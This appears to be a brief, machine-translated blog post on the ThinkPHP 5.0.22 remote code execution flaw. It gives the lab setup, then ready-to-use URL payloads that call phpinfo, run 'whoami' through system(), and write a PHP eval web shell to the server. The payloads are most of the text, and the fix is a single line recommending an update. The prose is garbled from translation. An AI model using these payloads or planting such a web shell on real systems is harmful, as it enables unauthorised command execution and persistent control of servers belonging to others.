thinkphp5.0 remote execution vulnerability

0x01 vulnerability Profile

Since ThinkPHP5 frame controller name without adequate safety monitoring, without leading to the forced opening of the route, you can disguise a particular request may be directly Getshell (controls server)

 

0x02 environment to build

Phpstudy：  php-5.5.38+Apache

Download flawed version I downloaded version is thinkphp_5.0.22 build a good future in Fig.

Download Link: http://www.thinkphp.cn/donate/download/id/1261.html

 

 

 

0x03 vulnerability payload

 Phpinfo page:

http://127.0.0.1/thinkphp_5.0.22/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

 

 

 

Execute whoami command:

http://127.0.0.1/thinkphp_5.0.22/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

 

 

 

 

Write shell :

 

http://127.0.0.1/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22snowwolf%22])?^%3E%3Eshell.php

 

 

 

 

 

 

 

 

 

Then you'll know how to do it.

Ha ha ha

 

0X03 bug fixes

We recommend that you update to the latest version